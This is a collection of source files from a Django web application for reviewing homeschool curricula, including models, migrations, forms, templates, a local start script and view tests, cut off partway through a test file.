"text": "from django.http import HttpResponse\nfrom django.middleware.common import CommonMiddleware\n\n\nclass OverrideCommonMiddleware(CommonMiddleware):\n def process_request(self, request):\n # Override to let health check bypass ALLOWED_HOSTS\n if request.path_info == \"/health/\":\n return HttpResponse(\"OK\")\n else:\n return super().process_request(request)\n"
},
{
"alpha_fraction": 0.5723844170570374,
"alphanum_fraction": 0.5875912308692932,
"avg_line_length": 44.66666793823242,
"blob_id": "7b0774958959d72234cdfc425b48b1ca9fa8f618",
"content_id": "48a9384f44b312da544d806c9b598ea5aa7dbc6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1644,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 36,
"path": "/config/settings/local.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from .base import * # noqa\nfrom .base import env\n\n# WhiteNoise\n# ------------------------------------------------------------------------------\n# http://whitenoise.evans.io/en/latest/django.html#using-whitenoise-in-development\nINSTALLED_APPS = [\"whitenoise.runserver_nostatic\"] + INSTALLED_APPS # noqa F405\n\n# django-debug-toolbar\n# ------------------------------------------------------------------------------\n# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#prerequisites\n# INSTALLED_APPS += [\"debug_toolbar\"] # noqa F405\n# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#middleware\n# MIDDLEWARE += [\"debug_toolbar.middleware.DebugToolbarMiddleware\"] # noqa F405\n# https://django-debug-toolbar.readthedocs.io/en/latest/configuration.html#debug-toolbar-config\n# DEBUG_TOOLBAR_CONFIG = {\n# \"DISABLE_PANELS\": [\"debug_toolbar.panels.redirects.RedirectsPanel\"],\n# \"SHOW_TEMPLATE_CONTEXT\": True,\n# }\n# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#internal-ips\nINTERNAL_IPS = [\"127.0.0.1\", \"10.0.2.2\"]\nif env.bool(\"USE_DOCKER\", default=False):\n import socket\n\n hostname, _, ips = socket.gethostbyname_ex(socket.gethostname())\n INTERNAL_IPS += [\".\".join(ip.split(\".\")[:-1] + [\"1\"]) for ip in ips]\n\n\n# django-extensions\n# ------------------------------------------------------------------------------\n# https://django-extensions.readthedocs.io/en/latest/installation_instructions.html#configuration\n# INSTALLED_APPS += [\"django_extensions\"] # noqa F405\n\n\n# Your stuff...\n# ------------------------------------------------------------------------------\n"
},
{
"alpha_fraction": 0.3786885142326355,
"alphanum_fraction": 0.3863388001918793,
"avg_line_length": 28.7560977935791,
"blob_id": "2b739b82ba24909f2806e4a5ed43ddbea41f59ba",
"content_id": "d418d8500a6af5467156499b2352f38518edbcf9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3660,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 123,
"path": "/fphs/curriculums/migrations/0002_auto_20191225_0321.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2019-12-25 03:21\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0001_initial\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"Age\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=3)),\n ],\n ),\n migrations.CreateModel(\n name=\"Category\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=50)),\n ],\n ),\n migrations.CreateModel(\n name=\"Grade\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=20)),\n ],\n ),\n migrations.CreateModel(\n name=\"Level\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=20)),\n ],\n ),\n migrations.CreateModel(\n name=\"Subject\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=50)),\n ],\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"ages\",\n field=models.ManyToManyField(\n related_name=\"curriculums\", to=\"curriculums.Age\"\n ),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"categories\",\n field=models.ManyToManyField(\n related_name=\"curriculums\", to=\"curriculums.Category\"\n ),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"grades\",\n field=models.ManyToManyField(\n related_name=\"curriculums\", to=\"curriculums.Grade\"\n ),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"levels\",\n field=models.ManyToManyField(\n related_name=\"curriculums\", to=\"curriculums.Level\"\n ),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"subjects\",\n field=models.ManyToManyField(\n related_name=\"curriculums\", to=\"curriculums.Subject\"\n ),\n ),\n ]\n"
},
{
"alpha_fraction": 0.39214658737182617,
"alphanum_fraction": 0.4157068133354187,
"avg_line_length": 32.50877380371094,
"blob_id": "4612ebab2650d135c776c50b58c09785944447b3",
"content_id": "579733fa71e7c966e9272a5c9d8ed55788a1fa2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1910,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 57,
"path": "/fphs/curriculums/migrations/0009_review.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-03-29 17:06\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n (\"curriculums\", \"0008_auto_20200315_1541\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"Review\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"content\", models.TextField(blank=True, max_length=5000)),\n (\n \"rating\",\n models.IntegerField(\n choices=[(1, \"1\"), (2, \"2\"), (3, \"3\"), (4, \"4\"), (5, \"5\")]\n ),\n ),\n (\"verified\", models.BooleanField(default=False)),\n (\"created\", models.DateTimeField(auto_now_add=True)),\n (\"updated\", models.DateTimeField(auto_now=True)),\n (\n \"curriculum\",\n models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE,\n related_name=\"reviews\",\n to=\"curriculums.Curriculum\",\n ),\n ),\n (\n \"user\",\n models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE,\n related_name=\"reviews\",\n to=settings.AUTH_USER_MODEL,\n ),\n ),\n ],\n options={\"ordering\": [\"-updated\"],},\n ),\n ]\n"
},
{
"alpha_fraction": 0.5313432812690735,
"alphanum_fraction": 0.5880597233772278,
"avg_line_length": 18.705883026123047,
"blob_id": "b60fe0bd29e7c097352f826e4dd6cb5b7088f162",
"content_id": "5f53277fef835e5ae0b7efcef12191542b5d32f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 335,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 17,
"path": "/fphs/users/migrations/0009_remove_user_occupation.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-07-31 00:02\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0008_user_favorite_curriculums'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='user',\n name='occupation',\n ),\n ]\n"
},
{
"alpha_fraction": 0.44355300068855286,
"alphanum_fraction": 0.4590258002281189,
"avg_line_length": 28.576271057128906,
"blob_id": "31c5fc28a27e6493143bcf4cf60795c9ca67e34a",
"content_id": "d11932ce9fc8fe93747f5babf0bc23a7b6136c62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1745,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 59,
"path": "/fphs/curriculums/migrations/0004_auto_20200103_2349.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-01-03 23:49\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0003_curriculum_link\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"Publisher\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=100)),\n (\"link\", models.URLField()),\n ],\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"consumable\",\n field=models.CharField(\n choices=[(\"Y\", \"Yes\"), (\"N\", \"No\"), (\"M\", \"Mixed\")],\n max_length=1,\n null=True,\n ),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"price\",\n field=models.DecimalField(decimal_places=2, default=0.0, max_digits=8),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"subscription\",\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"publisher\",\n field=models.ForeignKey(\n null=True,\n on_delete=django.db.models.deletion.CASCADE,\n related_name=\"curriculums\",\n to=\"curriculums.Publisher\",\n ),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7210526466369629,
"alphanum_fraction": 0.7298245429992676,
"avg_line_length": 35.774192810058594,
"blob_id": "0fc6aa173c97b2ee06e39694780e9f3443126f2d",
"content_id": "ed7fe0305b2a06d707050df70622347a4b223e55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1140,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 31,
"path": "/fphs/users/models.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.urls import reverse\nfrom fphs.curriculums.models import Curriculum\n\n\nclass User(AbstractUser):\n name = models.CharField(blank=True, max_length=255)\n bio = models.TextField(blank=True, max_length=2000)\n location = models.CharField(blank=True, max_length=255)\n website = models.URLField(blank=True)\n facebook = models.URLField(blank=True)\n instagram = models.URLField(blank=True)\n twitter = models.URLField(blank=True)\n pintrest = models.URLField(blank=True)\n public_reviews = models.BooleanField(default=True)\n favorite_curriculums = models.ManyToManyField(\n Curriculum,\n blank=True,\n related_name=\"favorited_by\",\n through=\"FavoriteCurriculum\",\n )\n\n def get_absolute_url(self):\n return reverse(\"users:profile\", kwargs={\"username\": self.username})\n\n\nclass FavoriteCurriculum(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n curriculum = models.ForeignKey(Curriculum, on_delete=models.CASCADE)\n created = models.DateTimeField(auto_now_add=True)\n"
},
{
"alpha_fraction": 0.6960698962211609,
"alphanum_fraction": 0.7013100385665894,
"avg_line_length": 33.69696807861328,
"blob_id": "8454d335afacbc78303be9b6b6801d8b2b99c19e",
"content_id": "aefda478b9f93f8ae75dfd38f69a0efffa1aa330",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1145,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 33,
"path": "/fphs/curriculums/templatetags/curriculum_extras.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django import template\n\nregister = template.Library()\n\n\[email protected]_tag\ndef is_filtered(items, filterIds):\n return bool(set(map(lambda i: i.id, items)).intersection(filterIds))\n\n\[email protected]_tag(\"curriculums/favorite.html\", takes_context=True)\ndef favorite_link(context, curriculum):\n request = context[\"request\"]\n user = request.user\n if user.is_anonymous:\n return {\"curriculum\": curriculum, \"is_favorite\": False}\n is_favorite = True if curriculum in user.favorite_curriculums.all() else False\n return {\"request\": request, \"curriculum\": curriculum, \"is_favorite\": is_favorite}\n\n\[email protected]_tag(\"reviews/star.html\")\ndef star_rating(rating):\n stars = range(int(rating))\n half = range(1 if rating % 1 >= 0.5 else 0)\n empty = range(5 - len(stars) - len(half))\n return {\"stars\": stars, \"half\": half, \"empty\": empty}\n\n\[email protected]_tag(\"reviews/link.html\", takes_context=True)\ndef review_link(context, curriculum):\n user = context[\"request\"].user\n review = curriculum.reviews.filter(user__id=user.id).first() or None\n return {\"curriculum\": curriculum, \"review\": review}\n"
},
{
"alpha_fraction": 0.40175631642341614,
"alphanum_fraction": 0.41931942105293274,
"avg_line_length": 40.40909194946289,
"blob_id": "2592773fc57e8b2f6c7c6b06cad23564b7652435",
"content_id": "257c0b07f8270afa3e44b13ad18d10cebea58c64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 911,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 22,
"path": "/fphs/curriculums/templates/reviews/row.html",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "{% load curriculum_extras %}\n\n<div class=\"row my-3\">\n <div class=\"col-12\">\n <div class=\"card shadow-sm\">\n <div class=\"card-body\">\n <div class=\"row\">\n <div class=\"col-12 col-md-9 col-lg-10\">\n {% if detail %}<h5><a href=\"{% url 'curriculums:detail' detail.slug %}\">{{detail}}</a></h5>{% endif %}\n {% include 'reviews/text.html' with review=review %}\n </div>\n <div class=\"col-12 col-md-3 col-lg-2 d-flex flex-column\">\n <h5>Rating: {{review.rating}}</h5>\n {% star_rating review.rating %}\n {# TODO: Add review ranking based on feedback #}\n {# {% include 'reviews/helpful.html' %} #}\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n"
},
{
"alpha_fraction": 0.4399999976158142,
"alphanum_fraction": 0.4699999988079071,
"avg_line_length": 27.205127716064453,
"blob_id": "418cd184d364b65c3014361e68aad0c2170843a9",
"content_id": "3b471089bc82267d51ffd19c3df2cd50da962e82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1100,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 39,
"path": "/fphs/curriculums/migrations/0011_auto_20200529_0234.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-05-29 02:34\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0010_auto_20200529_0201\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"ReligiousPreference\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=30)),\n ],\n ),\n migrations.AlterField(\n model_name=\"curriculum\",\n name=\"religious_preference\",\n field=models.ForeignKey(\n null=True,\n on_delete=django.db.models.deletion.SET_NULL,\n related_name=\"curriculums\",\n to=\"curriculums.ReligiousPreference\",\n ),\n ),\n ]\n"
},
{
"alpha_fraction": 0.4766410291194916,
"alphanum_fraction": 0.5002956986427307,
"avg_line_length": 30.90566062927246,
"blob_id": "c3c2153c9daf905a34bc7fee2f186866623d0db6",
"content_id": "81acf0f7cf93a7733a2583b231d4208144538762",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1691,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 53,
"path": "/fphs/curriculums/templates/curriculums/detail.html",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n\n{% load wagtailimages_tags curriculum_extras %}\n\n{% block head_title %}Curriculum - {{ curriculum.name }}{% endblock %}\n\n{% block content %}\n <div class=\"row\">\n <div class=\"col-md-3\">\n {% if curriculum.image %}\n {% image curriculum.image fill-320x240 %}\n {% else %}\n <img class=\"img-fluid\" src=\"https://via.placeholder.com/320x240\" class=\"mr-3\" alt=\"{{ curriculum.name }}\">\n {% endif %}\n </div>\n <div class=\"col-md-6\">\n <h1>{{ curriculum.name }}</h1>\n <p>{{ curriculum.description }}</p>\n </div>\n <div class=\"col-md-3\">\n <h4>Rating: {{ avg_rating }}</h4>\n {% star_rating avg_rating %}\n <br/>\n {% review_link curriculum %}\n {% favorite_link curriculum %}\n </div>\n </div>\n\n <br/><br/>\n <h4>Publisher</h4>\n <p>{{ curriculum.publisher }}</p>\n\n {% include 'curriculums/group.html' with name=\"categories\" list=categories %}\n {% include 'curriculums/group.html' with name=\"subjects\" list=subjects %}\n\n <h3>Grades</h3>\n <p>{{ grades.0 }}{% if grades.1 %} - {{ grades.1 }}{% endif %}</p>\n\n <h3>Ages</h3>\n <p>{{ ages.0 }}{% if ages.1 %} - {{ ages.1 }}{% endif %}</p>\n\n <div class=\"row my-2\">\n <div class=\"col-12\">\n <h3>Latest Reviews</h3>\n <h5><a href=\"{% url 'curriculums:reviews:index' curriculum.slug %}\">View All</a></h6>\n </div>\n </div>\n <div class=\"row my-2\">\n {% for review in reviews %}\n {% include 'reviews/card.html' with review=review %}\n {% endfor %}\n </div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.7128713130950928,
"alphanum_fraction": 0.7326732873916626,
"avg_line_length": 17.363636016845703,
"blob_id": "3b41dd50f15d8f8b51d770252a8954f4b46cd3a0",
"content_id": "c43dc1cfb607f1eced83be6298d468717cf8f2b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 202,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 11,
"path": "/compose/local/django/start",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nset -o errexit\nset -o pipefail\nset -o nounset\n\necho 'Running migrations...'\npython manage.py migrate\n\necho 'Starting application...'\nuvicorn config.asgi:application --host 0.0.0.0 --reload\n"
},
{
"alpha_fraction": 0.676508367061615,
"alphanum_fraction": 0.6854942440986633,
"avg_line_length": 25.86206817626953,
"blob_id": "23e7c6b8f3806115c71fef57659147c72c5712ff",
"content_id": "5897f32bda42d78a1ed1771afe95c0deb35ea221",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 779,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 29,
"path": "/fphs/utils/models.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nfrom wagtailmetadata.models import MetadataMixin\n\n\nclass Metadata(MetadataMixin):\n def __init__(self, request, title, description, image=None):\n self.request = request\n self.title = title\n self.description = description\n self.image = image\n\n def get_meta_url(self):\n return self.request.build_absolute_uri()\n\n def get_meta_title(self):\n return self.title\n\n def get_meta_description(self):\n return self.description\n\n def get_meta_image(self):\n return self.image\n\n\nclass Contact(models.Model):\n email = models.EmailField(blank=False, max_length=254, verbose_name=\"email address\")\n message = models.TextField(max_length=2000)\n replied = models.BooleanField(default=False)\n"
},
{
"alpha_fraction": 0.5767619013786316,
"alphanum_fraction": 0.5786666870117188,
"avg_line_length": 28.829545974731445,
"blob_id": "d8eb7bcd4cb76722993fa893d6624d33de323f21",
"content_id": "bd61485a1acf7f4e8b4d9dbeb3c91b9b4fe2d4e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2625,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 88,
"path": "/fphs/users/forms.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import HTML, Layout, Submit\nfrom django.contrib.auth import forms, get_user_model\nfrom django.core.exceptions import ValidationError\nfrom django.forms import ModelForm\nfrom django.utils.translation import ugettext_lazy as _\n\nFormHelper.use_custom_control = False\nUser = get_user_model()\n\n\nclass UserChangeForm(forms.UserChangeForm):\n class Meta(forms.UserChangeForm.Meta):\n model = User\n\n\nclass UserCreationForm(forms.UserCreationForm):\n\n error_message = forms.UserCreationForm.error_messages.update(\n {\"duplicate_username\": _(\"This username has already been taken.\")}\n )\n\n class Meta(forms.UserCreationForm.Meta):\n model = User\n\n def clean_username(self):\n username = self.cleaned_data[\"username\"]\n\n try:\n User.objects.get(username=username)\n except User.DoesNotExist:\n return username\n\n raise ValidationError(self.error_messages[\"duplicate_username\"])\n\n\nclass UserProfileForm(ModelForm):\n class Meta:\n model = User\n fields = [\n \"name\",\n \"bio\",\n \"location\",\n \"website\",\n \"facebook\",\n \"instagram\",\n \"twitter\",\n \"pintrest\",\n ]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n title = _(\"Profile\")\n self.helper = FormHelper()\n self.helper.layout = Layout(\n HTML(f\"<h1>{title}</h1>\"),\n \"name\",\n \"bio\",\n \"location\",\n \"website\",\n \"facebook\",\n \"instagram\",\n \"twitter\",\n \"pintrest\",\n Submit(\"submit\", _(\"Save\"), css_class=\"btn-secondary\"),\n )\n\n\nclass UserPrivacyForm(ModelForm):\n class Meta:\n model = User\n fields = [\"public_reviews\"]\n labels = {\"public_reviews\": _(\"Display reviews on public profile\")}\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n title = _(\"Privacy\")\n public_reviews_text = _(\n \"\"\"Enabling this setting allows reviews to be displayed as part of your profile. Removing\n reviews from your profile will not remove them from displaying on the curriculums themselves\"\"\"\n )\n self.helper = FormHelper()\n self.helper.layout = Layout(\n HTML(f\"<h1>{title}</h1>\"),\n \"public_reviews\",\n HTML(f'<div class=\"mb-4 text-muted\">{public_reviews_text}</div>'),\n Submit(\"submit\", _(\"Save\"), css_class=\"btn-secondary\"),\n )\n"
},
{
"alpha_fraction": 0.606656551361084,
"alphanum_fraction": 0.6626323461532593,
"avg_line_length": 26.54166603088379,
"blob_id": "5649700b1336a5d5716dd1a6a5df956dcaca3399",
"content_id": "547b81daef3fe0bef4e8a44142e4365f5165fb6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 661,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 24,
"path": "/fphs/curriculums/migrations/0005_auto_20200103_2354.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-01-03 23:54\n\nfrom django.db import migrations\n\n\ndef create_publishers(apps, schema_editor):\n Publisher = apps.get_model(\"curriculums\", \"Publisher\")\n Curriculum = apps.get_model(\"curriculums\", \"Curriculum\")\n\n for curriculum in Curriculum.objects.all():\n instance, _ = Publisher.objects.get_or_create(\n name=\"Default\", link=\"http://127.0.0.1\"\n )\n curriculum.publisher = instance\n curriculum.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0004_auto_20200103_2349\"),\n ]\n\n operations = [migrations.RunPython(create_publishers)]\n"
},
{
"alpha_fraction": 0.5071089863777161,
"alphanum_fraction": 0.5805687308311462,
"avg_line_length": 21.210525512695312,
"blob_id": "69ecf60d29124a7e81959b05710bf62a40da0ae1",
"content_id": "61e13f6100ad5790ab9309605f35b8f12c6e3a17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 19,
"path": "/fphs/curriculums/migrations/0003_curriculum_link.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2019-12-28 00:52\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0002_auto_20191225_0321\"),\n ]\n\n operations = [\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"link\",\n field=models.URLField(default=\"\"),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5521191358566284,
"alphanum_fraction": 0.5876288414001465,
"avg_line_length": 28.100000381469727,
"blob_id": "e58f0599c489332a8acba5bea74c34f1795f5da3",
"content_id": "302824784d462440e47ae8d6803083fa9d1f3dc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 873,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 30,
"path": "/fphs/curriculums/migrations/0008_auto_20200315_1541.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-03-15 15:41\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n (\"curriculums\", \"0007_auto_20200104_0331\"),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name=\"category\",\n options={\"verbose_name\": \"Category\", \"verbose_name_plural\": \"Categories\"},\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"created_by\",\n field=models.ForeignKey(\n null=True,\n on_delete=django.db.models.deletion.SET_NULL,\n related_name=\"curriculums\",\n to=settings.AUTH_USER_MODEL,\n ),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5375000238418579,
"alphanum_fraction": 0.550000011920929,
"avg_line_length": 31,
"blob_id": "c0f145845adcdc4ccd96cd325af3cbc4cc07ee5d",
"content_id": "2a36acec1e0a9ca85dea7ba31472cf0ae6f40e2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 160,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 5,
"path": "/fphs/curriculums/templates/curriculums/group.html",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "{# {% include 'curriculums/group.html' with name=\"\" list= %} #}\n<h3>{{ name.capitalize }}</h3>\n{% for item in list %}\n <li>{{ item.name }}</li>\n{% endfor %}\n"
},
{
"alpha_fraction": 0.48496994376182556,
"alphanum_fraction": 0.5170340538024902,
"avg_line_length": 27.514286041259766,
"blob_id": "c0f088b08e51a287450e198c78df616a2a33bf4a",
"content_id": "80219afe9dd52df675af37291caa91075bbc2b41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 998,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 35,
"path": "/fphs/curriculums/migrations/0007_auto_20200104_0331.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-01-04 03:31\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0006_auto_20200104_0004\"),\n ]\n\n operations = [\n migrations.RemoveField(model_name=\"curriculum\", name=\"categories\",),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"format\",\n field=models.CharField(\n choices=[(\"R\", \"Resource\"), (\"T\", \"Textbook\"), (\"W\", \"Workbook\")],\n max_length=1,\n null=True,\n ),\n ),\n migrations.AddField(\n model_name=\"subject\",\n name=\"category\",\n field=models.ForeignKey(\n blank=True,\n null=True,\n on_delete=django.db.models.deletion.SET_NULL,\n related_name=\"subjects\",\n to=\"curriculums.Category\",\n ),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6507518887519836,
"alphanum_fraction": 0.6612781882286072,
"avg_line_length": 40.5625,
"blob_id": "3a8bf9285e14caec11e8f170db0c2989ea3623b5",
"content_id": "08cb6c8add073ea147e4d57932a79dd7984178cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2660,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 64,
"path": "/fphs/curriculums/tests/test_views.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.test import TestCase\nfrom django.urls import reverse\n\nfrom .test_utils import create_curriculum\nfrom fphs.curriculums.urls import app_name\nfrom fphs.curriculums.models import Curriculum, Sort\n\n\nclass CurriculumIndexViewTest(TestCase):\n @classmethod\n def setUpTestData(cls):\n for i in range(5):\n create_curriculum(i + 1)\n\n def test_view_curriculums_url_settings_and_template(self):\n response = self.client.get(f\"/{app_name}/\")\n self.assertEqual(response.status_code, 200)\n\n response = self.client.get(reverse(f\"{app_name}:index\"))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, f\"{app_name}/index.html\")\n\n def test_view_curriculums_lists_all(self):\n response = self.client.get(f\"/{app_name}/\")\n curriculums = Curriculum.objects.all()\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context[app_name]), 5)\n self.assertEqual(\n list(response.context[app_name]),\n list(curriculums.order_by(Sort.Values.NEWEST.label)),\n )\n\n def test_view_curriculums_lists_filter_categories(self):\n curriculum = Curriculum.objects.get(name=1)\n category = curriculum.subjects.all().first().category.id\n response = self.client.get(f\"/{app_name}/?category={category}\")\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context[app_name]), 1)\n self.assertEqual(list(response.context[app_name]), [curriculum])\n\n def test_view_curriculums_lists_filter_multiple_params(self):\n curriculum = Curriculum.objects.get(name=1)\n grade = curriculum.grades.all().first().id\n age = curriculum.ages.all().first().id\n response = self.client.get(f\"/{app_name}/?grade={grade}&age={age}\")\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context[app_name]), 1)\n 